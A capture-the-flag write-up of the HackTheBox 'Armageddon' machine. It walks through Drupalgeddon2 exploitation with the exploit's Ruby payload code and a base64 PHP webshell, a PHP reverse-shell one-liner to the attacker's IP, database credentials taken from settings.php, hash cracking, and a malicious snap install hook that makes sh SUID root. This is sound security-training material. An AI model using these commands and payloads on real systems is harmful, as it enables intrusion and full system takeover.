imported>Aghanim at 10:54, 18 February 2022

2022-02-18T10:54:16Z

New page

{{Infobox WriteUp
| name = Armageddon
| platform = HackTheBox
| os = Linux
| difficulty = Easy
| techniques = Drupalgeddon2, Snap Privesc
}}

[[File:2022-02-image-4.png|thumb]]

This Linux machine had drupal running on one of the ports. I used drupalgeddon2 to upload a webshell and be able to run commands. I upgraded my shell, but could not get '''PTY '''so I had to read from the database using the command line. I then got the credentials to '''brudetherealadmin''' and he was able to run '''snap install '''as sudo. I created a malicous '''fpm '''package that changed the permissions to '''sh''' to root and with SUID bit set so I could just run '''./sh -p''' to get a root shell.

----

== Enumeration ==

I'll start with a NMAP scan.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/armageddon]
└─# nmap -sC -sV -p- --min-rate 10000 10.10.10.233 -oN nmap.ver
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-30 13:58 EST
Nmap scan report for 10.10.10.233
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Armageddon | Armageddon
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16

</syntaxhighlight>

Only two ports open, '''22 '''and '''80. '''

From the scan I can see that the webserver is running '''Apache httpd 2.4.6''' and it looks like its running Drupal 7.

Visiting the website I get this.

[[File:2022-02-Pasted-image-20220130200207.png|thumb]]

Tried different login credentials but I got nowhere.

From the NMAP scan I can see that there is a subdirectory called '''/CHANGELOG.txt'''.

[[File:2022-02-image-5.png|thumb]]

I can see that the latest version of Drupal is '''7.56'''.

== Initial Access - Shell as Apache ==

There were alot of RCE I could use. Searching in searchsploit I found this.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/armageddon]
└─# searchsploit drupal 7.56
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py

</syntaxhighlight>

I'll use '''Drupalgeddon 2''' and for that I need ruby installed on my machine.

From NIST

>
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
https://nvd.nist.gov/vuln/detail/cve-2018-7600

So from the script, we can see the payload for Drupal 7.

<syntaxhighlight lang="ruby">
elsif $drupalverion.start_with?("7") and element == "name"
# Method #3 - Drupal v7.x: name, #post_render - HTTP 200
url = $target + "#{$clean_url}#{$form}&name[%23post_render][]=" + phpfunction + "&name[%23type]=markup&name[%23markup]=" + evil
payload = "form_id=user_pass&_triggering_element_name=name"
end

# Drupal v7.x needs an extra value from a form
if $drupalverion.start_with?("7")
response = http_request(url, "post", payload, $session_cookie)

form_name = "form_build_id"
puts verbose("Form name : #{form_name}") if $verbose

form_value = response.body.match(/input type="hidden" name="#{form_name}" value="(.*)"/).to_s.slice(/value="(.*)"/, 1).to_s.strip
puts warning("WARNING: Didn't detect #{form_name}") if form_value.empty?
puts verbose("Form value : #{form_value}") if $verbose

url = $target + "#{$clean_url}file/ajax/name/%23value/" + form_value
payload = "#{form_name}=#{form_value}"
end
</syntaxhighlight>

=== Exploit ===

And when I run the script I get a shell as '''Apaceh'''.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/armageddon]
└─# ruby 44449.rb 10.10.10.233
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found : http://10.10.10.233/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo ALFQTDMK
[+] Result : ALFQTDMK
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.10.10.233/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : &1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>> id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
armageddon.htb>>

</syntaxhighlight>

Using burp I can see that it placed a webshell in '''/shell.php'''. I could in theory used curl to get a better shell, but I'll just use PHP in the shell I already got.

[[File:2022-02-image-6.png|thumb]]

<syntaxhighlight lang="bash">
armageddon.htb>> php -r '$sock=fsockopen("10.10.14.18",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
[!] WARNING: Detected an known bad character (>)

</syntaxhighlight>

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/armageddon]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.233] 41524
sh: no job control in this shell
sh-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh-4.2$

</syntaxhighlight>

== Initial Access - Shell as brucetherealadmin ==

=== Enumeration ===

I could not '''ls''' in the '''/home '''dir.

sh-4.2$ ls
ls
ls: cannot open directory .: Permission denied
sh-4.2$ pwd
pwd
/home
sh-4.2$

</pre>

But looking at passwd I can see that there is a user called '''brucetherealadmin. '''

sh-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash

</pre>

=== Database credentials ===

In '''/var/www/html/sites/default '''I found a php file called '''settings.php'''.

<syntaxhighlight lang="php">
* @endcode
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);

</syntaxhighlight>

I tried to upgrade my shell to PTY it didnt work. It says that it is out of PTY devices.

python3 -c 'import pty;pty.spawn("/bin/bash")'
Traceback (most recent call last):
File "", line 1, in
File "/usr/lib64/python3.6/pty.py", line 154, in spawn
pid, master_fd = fork()
File "/usr/lib64/python3.6/pty.py", line 96, in fork
master_fd, slave_fd = openpty()
File "/usr/lib64/python3.6/pty.py", line 29, in openpty
master_fd, slave_name = _open_terminal()
File "/usr/lib64/python3.6/pty.py", line 59, in _open_terminal
raise OSError('out of pty devices')
OSError: out of pty devices

</pre>

=== Read from database ===

I'll read from the database using the commandline instead. I get a hash for the user '''brucetherealadmin''' which I'll crack using john the ripper. I got the password for brucetherealadmin which is '''booboo'''.

<syntaxhighlight lang="bash">
sh-4.2$ mysql -e 'select * from users;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal

</syntaxhighlight>
<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/armageddon]
└─# john --show hash 1 ⨯
?:booboo

1 password hash cracked, 0 left
</syntaxhighlight>

=== SSH to user ===

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim]
└─# ssh brucetherealadmin@10.10.10.233 130 ⨯
Enter passphrase for key '/root/.ssh/id_rsa':
brucetherealadmin@10.10.10.233's password:
Last login: Fri Feb 18 10:27:49 2022 from 10.10.14.18
[brucetherealadmin@armageddon ~]$ id
uid=1000(brucetherealadmin) gid=1000(brucetherealadmin) groups=1000(brucetherealadmin) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[brucetherealadmin@armageddon ~]$

</syntaxhighlight>

== Root ==

I always like to see if the user can run any commands as sudo. In this instance, bruce could run '''snap install '''as sudo with the wildcard at the end. That means it could run any command after snap install.

<syntaxhighlight lang="bash">
[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
</syntaxhighlight>

From GTFObins

[[File:2022-02-image-7.png|thumb]]

So what we do here is do a command and use FPM to create a malicious snap package.

From FPM doc.

>
The goal of fpm is to make it easy and quick to build packages such as rpms, debs, OSX packages, etc.
https://fpm.readthedocs.io/en/v1.13.1/

=== Privilege Escalation ===

I spent too much time on this one to get it work. So I ended up copying '''sh''' to bruces home dir and changed the permission to root with SUID bit. Then I could just run '''./sh -p '''to retain permissions.

First I run the commands on my attacker machine to create the malicious snap package.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/armageddon]
└─#
COMMAND="chown root:root /home/brucetherealadmin/sh; chmod 4755 /home/brucetherealadmin/sh"
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

Created package {:path=>"xxxx_1.0_all.snap"}
</syntaxhighlight>

So what this command does is it gives root ownership of '''sh''' and set the permissions with SUID bit.

<syntaxhighlight lang="bash">
-rwsr-xr-x. 1 root root 964536 Feb 18 10:45 sh

</syntaxhighlight>

So if I now run the sh with '''-p''' I will become root.

<syntaxhighlight lang="bash">
[brucetherealadmin@armageddon ~]$ ./sh -p
sh-4.2# id
uid=1000(brucetherealadmin) gid=1000(brucetherealadmin) euid=0(root) groups=1000(brucetherealadmin) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2#

</syntaxhighlight>

You can see that my euid=0(root).

<syntaxhighlight lang="bash">
sh-4.2# cd /root
sh-4.2# ls -l
total 20
-rw-------. 1 root root 1260 Dec 2 2020 anaconda-ks.cfg
-rwx------. 1 root root 142 Mar 11 2021 cleanup.sh
-rw-r--r--. 1 root root 974 Mar 11 2021 passwd
-rwx------. 1 root root 67 Mar 11 2021 reset.sh
-r--------. 1 root root 33 Feb 18 09:36 root.txt
drwxr-xr-x. 4 root root 35 Feb 18 10:49 snap
sh-4.2#

</syntaxhighlight>

== What I've learned ==

* Since this machine was using an old version of Drupal I was able to get a shell on the box. * PTY was disabled and I couldnt open mysql so I had to read from the database using commandline. From settings.php I got all the info I needed to read from the commandline. * Since bruce could run snap install * as sudo I was able to craft a malicious snap package and transfere it to the target machine and run. I could run basically any command.

[[Category:HackTheBox]]
[[Category:Linux]]
[[Category:Write-ups]]

Write-ups/HTB/Armageddon - Revision history

imported>Aghanim at 10:54, 18 February 2022